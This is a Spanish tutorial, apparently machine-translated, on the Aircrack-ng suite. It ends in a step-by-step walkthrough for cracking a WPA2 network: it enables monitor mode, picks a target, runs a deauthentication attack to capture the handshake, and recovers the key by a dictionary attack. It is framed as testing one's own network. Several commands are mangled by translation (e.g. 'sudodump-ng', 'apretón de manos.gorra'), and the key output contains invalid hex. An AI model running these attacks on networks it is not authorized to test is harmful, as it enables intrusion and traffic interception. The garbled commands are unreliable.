Cómo usar Aircrack-ng

Cómo usar Aircrack-ng
La mayoría de las veces, las personas nunca piensan en la red a la que están conectadas. Nunca piensan cuán segura es esa red y cuánto arriesgan sus datos confidenciales a diario. Puede ejecutar verificaciones de vulnerabilidad en sus redes wifi utilizando una herramienta muy poderosa llamada Aircrack-ng y Wireshark. Wireshark se utiliza para monitorear la actividad de la red. Aircrack-ng es más como una herramienta agresiva que le permite piratear y dar acceso a las conexiones inalámbricas. Pensar como intruso siempre ha sido la forma más segura de protegerse contra un truco. Es posible que pueda comprender las acciones exactas que tomará un intruso para obtener acceso a su sistema aprendiendo sobre Aircrack. Luego puede realizar controles de cumplimiento en su propio sistema para asegurarse de que no sea inseguro.

Aircrack-ng es un conjunto completo de software diseñado para probar la seguridad de la red WiFi. No es solo una sola herramienta, sino una colección de herramientas, cada una de las cuales realiza un propósito particular. Se pueden trabajar en diferentes áreas de seguridad WiFi, como monitorear el punto de acceso, probar, atacar la red, romper la red WiFi y probarla. El objetivo clave de Aircrack es interceptar los paquetes y descifrar los hash para romper las contraseñas. Admite casi todas las nuevas interfaces inalámbricas. Aircrack-ng es una versión mejorada de un avión de suite de herramientas obsoleto, NG se refiere al Nueva generación. Algunas de las herramientas increíbles que trabajan juntas para llevar a cabo una tarea más grande.

Airmon-ng:

Airmon-NG se incluye en el kit Aircrack-NG que coloca la tarjeta de interfaz de red en el modo de monitor. Las tarjetas de red generalmente solo aceptarán paquetes dirigidos para ellos según lo definido por la dirección MAC de la NIC, pero con Airmon-NG, todos los paquetes inalámbricos, ya sean dirigidos o no, también se aceptarán. Debería poder atrapar estos paquetes sin vincular o autenticarse con el punto de acceso. Se utiliza para verificar el estado de un punto de acceso colocando la interfaz de red en modo monitor. En primer lugar, uno debe configurar las tarjetas inalámbricas para activar el modo de monitor, luego matar todos los procesos de fondo si cree que cualquier proceso está interfiriendo con ella. Después de terminar los procesos, el modo de monitor se puede habilitar en la interfaz inalámbrica ejecutando el comando a continuación:

ubuntu@ubuntu: ~ $ sudo airmon-ng inicio wlan0 #

También puede deshabilitar el modo de monitor deteniendo el Airmon-NG en cualquier momento utilizando el comando a continuación:

ubuntu@ubuntu: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng se utiliza para enumerar todas las redes que nos rodean y para ver información valiosa sobre ellas. La funcionalidad básica de Airodump-NG es oler paquetes, por lo que está esencialmente programado para agarrar todos los paquetes a nuestro alrededor mientras se coloca en el modo monitor. Lo ejecutaremos con todas las conexiones a nuestro alrededor y recopilaremos datos como el número de clientes conectados a la red, sus direcciones MAC correspondientes, estilo de cifrado y nombres de canales y luego comenzar a orientar nuestra red de destino.

Al escribir el comando Airodump-NG y darle el nombre de la interfaz de red como parámetro, podemos activar esta herramienta. Enumerará todos los puntos de acceso, la cantidad de paquetes de datos, los métodos de cifrado y autenticación utilizados, y el nombre de la red (ESSID). Desde un punto de vista de piratería, las direcciones MAC son los campos más importantes.

ubuntu@ubuntu: ~ $ sudodump-ng wlx0mon

Aircrack-ng:

Aircrack se utiliza para agrietarse con contraseña. Después de capturar todos los paquetes con Airodump, podemos descifrar la llave por Aircrack. Desarrolla estas teclas utilizando dos métodos PTW y FMS. El enfoque PTW se realiza en dos fases. Al principio, solo se están utilizando los paquetes ARP, y solo entonces, si la llave no se agrieta después de la búsqueda, usa todos los demás paquetes capturados. Un punto más del enfoque PTW es que no todos los paquetes se usan para el agrietamiento. En el segundo enfoque, yo.mi., FMS, usamos tanto los modelos estadísticos como los algos de fuerza bruta para romper la llave. También se puede utilizar un método de diccionario.

Aireplay-NG:

AirPlay-NG introduce paquetes en una red inalámbrica para crear o acelerar el tráfico. Los paquetes de dos fuentes diferentes pueden ser capturados por Aireplay-NG. La primera es la red en vivo, y la segunda es los paquetes del archivo PCAP ya existido. AirPlay-NG es útil durante un ataque de desautenticación que se dirige a un punto de acceso inalámbrico y un usuario. Además, puede realizar algunos ataques como Attack de café con leche con AirPlay-NG, una herramienta que le permite obtener una llave del sistema del cliente. Puede lograr esto captando un paquete ARP y luego manipulándolo y enviándolo al sistema. Luego, el cliente creará un paquete que puede ser capturado por Airodump y Aircrack agrieta la llave de ese paquete modificado. Algunas otras opciones de ataque de AirPlay-NG incluyen Chopchop, Fragment ArePreplay, etc.

Base-NG:

Airbase-ng se usa para transformar la computadora de un intruso en un punto de conexión comprometido para que otros se vinculen a. Usando AirBase-NG, puede afirmar que es un punto de acceso legal y realizar ataques de hombre en el medio en las computadoras que están conectadas a su red. Este tipo de ataques se llaman ataques gemelos malvados. Es imposible que los usuarios básicos discernan entre un punto de acceso legal y un punto de acceso falso. Entonces, la amenaza gemela malvada se encuentra entre las amenazas inalámbricas más amenazantes que enfrentamos hoy.

Airolib-ng:

Airolib acelera el proceso de piratería almacenando y administrando las listas de contraseñas y el punto de acceso. El sistema de administración de bases de datos utilizadas por este programa es SQLITE3, que está en su mayoría disponible en todas las plataformas. El agrietamiento de la contraseña incluye el cálculo de la tecla maestra por pares a través de la cual se extrae la clave transitoria privada (PTK). Usando el PTK, puede determinar el Código de identificación del mensaje de cuadro (MIC) para un paquete dado y teóricamente encontrar que el micrófono es similar al paquete, por lo que si el PTK era correcto, el PMK también era correcto.

Para ver las listas de contraseñas y acceder a las redes almacenadas en la base de datos, escriba el siguiente comando:

ubuntu@ubuntu: ~ $ sudo airolib -ng testdatabase -stats

Aquí TestDatabase es el DB al que desea acceder o crear, y -Stats es la operación que desea realizar en ella. Puede realizar múltiples operaciones en los campos de la base de datos, como dar la máxima prioridad a algún SSID o algo. Para usar airolib-ng con aircrack-ng, ingrese el siguiente comando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -r testdatabase WPA2.eapol.gorra

Aquí estamos usando el PMK ya calculado almacenado en el testdatabase Para acelerar el proceso de agrietamiento de contraseña.

Cracking WPA/WPA2 usando Aircrack-ng:

Veamos un pequeño ejemplo de lo que Aircrack-Ng puede hacer con la ayuda de algunas de sus increíbles herramientas. Deslice la tecla previa al intercambio de una red WPA/WPA2 utilizando un método de diccionario.

Lo primero que debemos hacer es enumerar las interfaces de red que admiten el modo de monitor. Esto se puede hacer usando el siguiente comando:

ubuntu@ubuntu: ~ $ sudo airmon-ng
Chipset de controlador de interfaz PHY
Phy0 WLX0 RTL8XXXU Realtek Semiconductor Corp.

Podemos ver una interfaz; Ahora, tenemos que colocar la interfaz de red que hemos encontrado (WLX0) en modo de monitor usando el siguiente comando:

ubuntu@ubuntu: ~ $ sudo airmon-ng inicio wlx0

Tiene modo de monitor habilitado en la interfaz llamada wlx0mon.

Ahora deberíamos comenzar a escuchar las transmisiones de los enrutadores cercanos a través de nuestra interfaz de red que hemos puesto en modo de monitor.

ubuntu@ubuntu: ~ $ sudodump-ng wlx0mon
CH 5] [transcurrido: 30 s] [2020-12-02 00:17
BSSID PWR BEACIONS #DATA, #/S CH MB ENC CIPHER AUTH ESSID
E4: 6f: 13: 04: CE: 31-45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: be -63 77 0 0 6 54e. WPA2 CCMP PSK Hackme
C8: 3a: 35: A0: 4e: 01 -63 84 0 0 8 54E WPA2 CCMP PSK NET07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP -Link_3802
BSSID Station PWR Tasa de marcos perdidos sonda
E4: 6f: 13: 04: CE: 31 5C: 3a: 45: D7: EA: 8b -3 0 - 1e 8 5
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6f: 13: 04: CE: 31 a. C.: 91: B5: F8: 7e: D5 -39 0e- 1 1002 13

Nuestra red objetivo es Decifralo En este caso, que actualmente se ejecuta en el canal 1.

Aquí para descifrar la contraseña de la red de destino, necesitamos capturar un apretón de manos de 4 vías, que ocurre cuando un dispositivo intenta conectarse a una red. Podemos capturarlo usando el siguiente comando:

ubuntu@ubuntu: ~ $ sudo Airodump -ng -c 1 - -Bssid E4: 6f: 13: 04: CE: 31 -W /Home Wlx0

-C : Canal

-bssid: BSSID de la red de destino

-w : El nombre del directorio donde se colocará el archivo PCAP

Ahora tenemos que esperar a que un dispositivo se conecte a la red, pero hay una mejor manera de capturar un apretón de manos. Podemos desautorizar los dispositivos al AP utilizando un ataque de desauthenticación utilizando el siguiente comando:

ubuntu@ubuntu: ~ $ sudo Aireplay -ng -0 -a E4: 6f: 13: 04: CE: 31

a: BSSID de la red de destino

-0: ataque de desautenticación

Hemos desconectado todos los dispositivos, y ahora tenemos que esperar a que un dispositivo se conecte a la red.

CH 1] [transcurrido: 30 s] [2020-12-02 00:02] [WPA Handshake: E4: 6f: 13: 04: CE: 31
BSSID PWR RXQ BEACIONS #DATA, #/S CH MB ENC CIPHER AUTH E
E4: 6f: 13: 04: CE: 31-47 1 228 807 36 1 54E WPA2 CCMP PSK P
BSSID Station PWR Tasa de marcos perdidos sonda
E4: 6f: 13: 04: CE: 31 a. C.: 91: B5: F8: 7e: D5 -35 0 - 1 0 1
E4: 6f: 13: 04: CE: 31 5C: 3a: 45: D7: EA: 8b -29 0e- 1e 0 22
E4: 6f: 13: 04: CE: 31 88: 28: B3: 30: 27: 7e -31 0e- 1 0 32
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 Crackit
E4: 6f: 13: 04: CE: 31 D4: 6a: 6a: 99: ed: e3 -35 0e- 0e 0 86
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1

Recibimos un golpe, y al mirar la esquina superior derecha justo al lado del tiempo, podemos ver que se ha capturado un apretón de manos. Ahora mire en la carpeta especificada ( /hogar en nuestro caso) para un ".PCAP" archivo.

Para descifrar la tecla WPA, podemos usar el siguiente comando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -a2 -w rockyou.txt -b e4: 6f: 13: 04: ce: 31 apretón de manos.gorra
B: BSSID de la red objetivo
-A2: modo WPA2
Rockearte.txt: el archivo del diccionario utilizado
Apretón de manos.Cap: el archivo que contiene apretón de manos capturado
Aircrack-ng 1.2 beta3
[00:01:49] 10566 claves probadas (1017.96 k/s)
LLAVE ENCONTRADA! [ me tienes ]
Clave maestra: 8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ed BC 6B H7 J8 K1 A0 89 6B 7B B B F7 6F 50 C
Clave transitoria: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 Ed BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
Mac: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

La clave para nuestra red de destino se ha descifrado con éxito.

Conclusión:

Las redes inalámbricas están en todas partes, utilizadas por todas y cada una de las empresas, desde trabajadores que usan teléfonos inteligentes hasta dispositivos de control industrial. Según la investigación, casi más del 50 por ciento del tráfico de Internet estará sobre WiFi en 2021. Las redes inalámbricas tienen muchas ventajas, comunicación fuera de las puertas, acceso rápido a Internet en lugares donde es casi imposible colocar cables, puede expandir la red sin instalar cables para ningún otro usuario y puede conectar fácilmente sus dispositivos móviles a sus oficinas de origen 'T allí.

A pesar de estas ventajas, hay un gran signo de interrogación sobre su privacidad y seguridad. Como estas redes; Dentro del rango de transmisión de enrutadores están abiertos a todos, se pueden atacar fácilmente y sus datos pueden verse fácilmente comprometidos. Por ejemplo, si está conectado a algún wifi público, cualquier persona conectada a esa red puede verificar fácilmente el tráfico de su red utilizando algo de inteligencia y con la ayuda de herramientas increíbles disponibles e incluso descargarlo.